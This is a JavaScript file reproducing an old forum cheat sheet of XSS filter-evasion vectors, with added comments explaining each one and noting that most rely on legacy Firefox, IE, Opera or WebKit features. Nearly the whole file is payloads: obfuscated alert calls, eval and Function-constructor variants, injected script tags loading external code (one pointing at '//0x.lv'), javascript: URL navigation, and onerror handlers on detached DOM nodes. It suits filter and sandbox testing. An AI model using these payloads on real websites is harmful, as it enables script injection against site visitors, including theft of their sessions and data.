/*
 * I will be updating this thread, when I have time, with the vectors posted in the replies; any mods feel free to help.
 * Note: most entries rely on engine features of their era (E4X literals, __noSuchMethod__, sharp variables,
 * JScript conditional compilation, javascript: image sources) and are tagged ff/ie/opera/WebKit only —
 * treat them as a historical reference for filter and sandbox testing, not as payloads that work in current browsers.
*/
//Direct execution
// Global-object lookup by string key: the source never contains a bare `alert` identifier, so a
// token-based filter does not see a call to it. Any alias of the global object works in place of
// `window` (this, self, top, parent, frames, ...).
window["alert"](1);//this["alert"],self["alert"],etc.. see references to window
// E4X XML literal as the property key (JavaScript 1.6 / SpiderMonkey extension): the anonymous
// fragment `<>alert</>` stringifies to "alert" when used as a property name, so the word is never
// written as a string or identifier.
// NOTE(review): E4X has been removed from Firefox; expect a SyntaxError in current engines.
self[<>alert</>](1);//JS1.6+
// Same E4X trick with the name wrapped in a CDATA section, which still stringifies to "alert" —
// useful when the previous form is matched by a filter.
// NOTE(review): E4X has been removed from Firefox; expect a SyntaxError in current engines.
self[<><![CDATA[alert]]></>](1);
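// Hex-escaped property name: "\x61\x6c\x65\x72\x74" is "alert", so the literal word never appears
// in the source. The empty block comments /**/ show that comments can stand in for whitespace
// between tokens where a filter might expect a space.
// (Restored from the post: the backslashes and quotes were lost in extraction, which turned the key
// into an undefined identifier and made the line throw a ReferenceError.)
top/**/["\x61\x6c\x65\x72\x74"]/**/(1);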
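// Unicode escape inside the identifier: \u0061 is "a", so the parser resolves `alert` although the
// source never contains that token. (Backslash restored; the extracted copy read `u0061lert`.)
\u0061lert(1);
// NOTE(review): the post also lists `alert\u000a(1)` (again minus its backslash). \u000a is a line
// feed, which is not a valid IdentifierPart, so current engines reject that form at parse time; it
// is left as this note rather than guessed at.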
// Legacy SpiderMonkey "sharp variable" syntax (`#1=` labels the object literal) plus a non-ASCII
// identifier (`ä`): `{}&&alert` evaluates to `alert`, which is assigned to `ä` and then called.
// NOTE(review): sharp variables were removed from SpiderMonkey; expect a SyntaxError today.
(ä=#1={}&&alert)(ä);//ff only
// Indirect call: valueOf() on a function returns the function itself, and Function.prototype.call
// invokes it with an explicit `this` (self) — there is no direct `alert(` call in the source.
alert.valueOf().call(self,1);
// Same idea through an array literal: wrap the function, index it back out, unwrap it again with
// valueOf(), then call the result.
[alert.valueOf()][0].valueOf()(1);
// JScript conditional compilation (IE only): after `@cc_on`, text inside /*@ ... @*/ is executed by
// JScript but is an ordinary comment to every other engine. IE therefore runs `{x=alert}x(/xss/)`,
// while other browsers only see `{x}x;`.
{x/*@cc_on=alert@*/}x/*@(/xss/@*/); // ie only
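// Firefox-only: __noSuchMethod__ is invoked as handler(name, argsArray) when a missing method is
// called. With Function as the handler the call becomes Function("aaaaa$$$...", ["alert(1)"]), i.e.
// a function whose parameter list is the method name and whose body is "alert(1)"; the trailing ()
// runs it. The odd method name only has to be a legal parameter name.
// (ASCII quotes restored; the extracted copy had typographic quotes, which do not parse.)
// NOTE(review): __noSuchMethod__ was removed from Firefox; expect a TypeError in current engines.
({__noSuchMethod__:Function}).aaaaa$$$$$$$$$dddddddfffffff_____("alert(1)")()//ff only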
//ff only
// The __noSuchMethod__ handler receives (name, args), so calling a non-existent method whose name IS
// the payload hands that string to the handler as its first argument:
//   location.replace("javascript:alert(1)", [])  -> navigates to the javascript: URL
location.__noSuchMethod__=location.replace;location["javascript:alert(1)"]();
//   setTimeout("alert(2)", [])                   -> evaluates the string as code
// NOTE(review): __noSuchMethod__ has since been removed from Firefox.
window.__noSuchMethod__=setTimeout;window["alert(2)"]();
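// Function execution with no `=`, `(` or `)`: string concatenation applies ToPrimitive to the
// object literal, which calls its own toString — here `alert` — with no arguments.
// (ASCII quotes restored; the extracted copy had typographic quotes, which do not parse.)
""+{toString:alert}//code execution with no [=()], doesnt work on FF with native functions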
// Numeric coercion path: `1*obj` applies ToPrimitive with hint "number", which calls the object's
// own valueOf — `alert` — with no arguments. Same limitation on Firefox as the toString variant.
1*({valueOf:alert})//code execution with no [=()], doesnt work on FF with native functions
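// Legacy SpiderMonkey `setter` syntax: `a setter=alert` installs alert as the setter of global `a`,
// so the plain assignment `a="hello"` calls alert("hello") — execution with no call parentheses.
// (ASCII quotes restored; the extracted copy had typographic quotes, which do not parse.)
// NOTE(review): this non-standard syntax was removed from Firefox; expect a SyntaxError today.
a setter=alert;a="hello";// function execution without [()] ff only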
//Evaluate code
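// Direct eval of a string: the baseline code-evaluation primitive the following lines vary on.
// (ASCII quotes restored; the extracted copy had typographic quotes, which do not parse.)
eval("alert(1)");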
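// Browser timers accept a string and evaluate it as code (an implicit eval with global scope).
// (ASCII quotes restored; the extracted copy had typographic quotes, which do not parse.)
setTimeout("alert(1)");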
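// Same as setTimeout but repeating: with no interval given the string is re-evaluated continuously.
// (ASCII quotes restored; the extracted copy had typographic quotes, which do not parse.)
setInterval("alert(1)");//lots of alerts..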
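// Function constructor: compiles the string as a function body (global scope) and the trailing ()
// runs it — eval without the word `eval`.
// (ASCII quotes restored; the extracted copy had typographic quotes, which do not parse.)
Function("alert(1)")();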
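// Spells "Function" without writing it: `typeof prompt` is "function", and upper-casing its first
// character yields "Function", so self["Function"] is the Function constructor. The replacer is
// the `String.toUpperCase` generic, a non-standard SpiderMonkey static.
// NOTE(review): String generics were later removed from Firefox — confirm before relying on this.
// (ASCII quotes restored; the extracted copy had typographic quotes, which do not parse.)
self[(typeof prompt).replace(/^./,String.toUpperCase)]("alert(1)")();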
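// Reaches the Function constructor from any object: [].constructor is Array, whose constructor is
// Function. Works even when the global name `Function` is shadowed or filtered.
// (ASCII quotes restored; the extracted copy had typographic quotes, which do not parse.)
[].constructor.constructor('alert(1)')();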
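// IE-only global that evaluates a string in global scope (JScript; also accepts VBScript with a
// second argument, not used here).
// (ASCII quotes restored; the extracted copy had typographic quotes, which do not parse.)
execScript("alert(1)");//IE only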
// E4X literal spelling "eval" (JS1.6 / Firefox of that era). The argument `name` resolves to
// window.name, which an opener or framing page controls — a common carrier for the real payload.
// NOTE(review): E4X has been removed from Firefox; expect a SyntaxError in current engines.
window[<>eval</>](name);//JS1.6+
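// String.prototype.replace with a function replacer: the callback receives the matched text as its
// first argument, so passing eval directly evaluates it. /.*/g matches the whole string (and then
// an empty string at the end, which eval ignores).
// (ASCII quotes restored; the extracted copy had typographic quotes, which do not parse.)
'alert("xss")'.replace(/.*/g,eval)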
//Generate/add script tags
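// Loads an external script: body.previousSibling is <head> in a normally structured document, and
// `with(document)` resolves body/createElement without repeating `document.`. Replace 'URL' with the
// script source.
// (ASCII quotes restored; the extracted copy had typographic quotes, which do not parse.)
with(document)body.previousSibling.appendChild(createElement('script')).src='URL'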
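// Same injection, locating <head> explicitly with querySelector instead of via the body's sibling.
// (ASCII quotes restored; the extracted copy had typographic quotes, which do not parse.)
with(document)querySelector('head').appendChild(createElement('script')).src='URL'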
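// E4X (Firefox only): builds an XML <script/> element and sets its src attribute with the `.@attr`
// syntax; toXMLString() only serialises it — nothing is inserted into the document or executed.
// (ASCII quotes restored; the extracted copy had typographic quotes, which do not parse.)
// NOTE(review): E4X has been removed from Firefox; expect a SyntaxError in current engines.
with(a=<script />)a.@src='URL',a.toXMLString();//FF only, generates the string only (doesn't execute)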
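// Script injection through the namespaced API: createElementNS with the XHTML namespace and the
// qualified name 'html:script' yields a real script element, so filters that only watch
// createElement('script') miss it.
// (Restored from the post: the opening quote of 'html:script' and the ASCII quotes were lost in
// extraction, which left the line unparseable.)
with(document)body.previousSibling.appendChild(createElementNS('http://www.w3.org/1999/xhtml','html:script')).src='URL'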
//Detached DOM nodes ("virtual DOM"): code runs before — or without — any appendChild, which can escape sandboxes that only guard insertion into the live document
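//IE only
// Detached subtree: the <script> is appended to an <html> element that is never inserted into the
// document, yet (per the post) IE runs it anyway — so hooks on document insertion never see it.
// Inline code via .text:
document.createElement("html").appendChild(document.createElement("script")).text="alert('ie sucks')";
// External code via src (a protocol-relative URL to the author's host; substitute your own):
// (Restored from the post: `ddocument` typo and the missing opening quote of the src value.)
document.createElement("html").appendChild(document.createElement("script")).setAttribute('src','//0x.lv');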
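//WebKit only (Chrome/Safari)
// Detached XHTML <html> element: setting innerHTML parses a <meta http-equiv="Refresh"> whose target
// is a javascript: URL; per the post, WebKit of that era honoured the refresh although the node was
// never attached to the document.
// (ASCII quotes restored; the extracted copy had typographic quotes, which do not parse.)
document.createElementNS("http://www.w3.org/1999/xhtml","html").innerHTML='<html:head><meta http-equiv="Refresh" content="0;URL=javascript:alert(/HACKED/);"></html:head>';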
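//FF only
// Detached nodes whose load fires an event handler before any appendChild: each creates an <img>
// with an onerror handler and a src ('.' / './', the current directory URL) that is not an image,
// so onerror fires. (Quotes restored; the extracted copy had typographic quotes and had lost the
// opening quotes of the handler strings.)
document.createElement("pre").innerHTML="<img onerror='alert(1)' src='./'>";
with(new Image)setAttribute('onerror','alert(1)'),src='.';
with(document.createElement("img"))setAttribute('onerror','alert(1)'),setAttribute('src','.');
// Property names and payload can both come from attacker-controlled strings (see the tip): the
// property written is taken from window.name and its value from location.hash.
new Option().innerHTML="<img src='.' onerror=alert(1)>";//tip: [new Option][0][name]=location.hash // name=innerHTML location.hash=<img src...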
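// Opera only
// Per the post, Opera executed a javascript: URL assigned to an image's src — no insertion needed.
// (ASCII quotes restored; the extracted copy had typographic quotes, which do not parse.)
new Image().src="javascript:alert(1234)";
document.createElement('img').src="javascript:alert(1234)";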
//Location
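// Navigating to a javascript: URL runs it in the current document; plain assignment to location.
// (ASCII quotes restored; the extracted copy had typographic quotes, which do not parse.)
location='javascript:alert(1)';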
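// Same navigation through the assign() method rather than assignment.
// (ASCII quotes restored; the extracted copy had typographic quotes, which do not parse.)
location.assign('javascript:alert(1)');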
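// Same navigation through replace(), which also avoids adding a history entry.
// (ASCII quotes restored; the extracted copy had typographic quotes, which do not parse.)
location.replace('javascript:alert(1)');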
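// supposing the url is http://victim/asdf/#%0aalert(1) (ie only)
// Changing only the scheme presumably makes IE navigate to javascript://victim/asdf/#%0aalert(1):
// the "//victim/asdf/#" part is a JavaScript line comment, %0a decodes to a newline, and alert(1)
// runs on the following line.
// (ASCII quotes restored; the extracted copy had typographic quotes, which do not parse.)
location.protocol='javascript';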
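// IE treated document.URL as writable and navigated on assignment, like setting location.
// (ASCII quotes restored; the extracted copy had typographic quotes, which do not parse.)
document.URL='javascript:alert(1)';//ie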
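// E4X Namespace object (Firefox only): Namespace(uri).uri hands the string back, with the \x61 hex
// escape hiding the "a" of alert; assigning the result to location navigates to the javascript: URL.
// (Restored from the post: the backslash of the escape and the ASCII quotes were lost in extraction.)
// NOTE(review): E4X has been removed from Firefox; Namespace is not defined in current engines.
location=Namespace('javascript:\x61lert(1)').uri//ff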
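// Rewrites the src of the <iframe> this document lives in to a javascript: URL. Requires a
// same-origin parent (frameElement is null across origins). Setup from the post: frame a page that
// itself contains a frame, then point frames[0].frames[0].location at the victim page.
// (ASCII quotes restored; the extracted copy had typographic quotes, which do not parse.)
frameElement.src='javascript:alert(1)';/*requires to be framed in same origin (frame a page with a frame and do frames[0].frames[0].location="xss victim")*/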
//Etc..
<!-- Meta refresh pointing at a Flash file (.swf) rather than a script. NOTE(review): the delay
     before the comma is empty ("content=,url=..."); either the post relies on lenient refresh
     parsing or a digit was lost in extraction (the usual form is content=0;url=...) - confirm
     before relying on it. -->
<meta http-equiv=refresh content=,url=xss.swf>
// IE only: document.styleSheets(0) (IE collection-call syntax) is the first stylesheet, and
// assigning cssText replaces its rules with the contents of window.name — CSS supplied by whoever
// opened or framed the page. The post does not say what CSS it expects; presumably IE-specific
// constructs such as expression() — verify.
document.styleSheets(0).cssText=name;//IE only
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat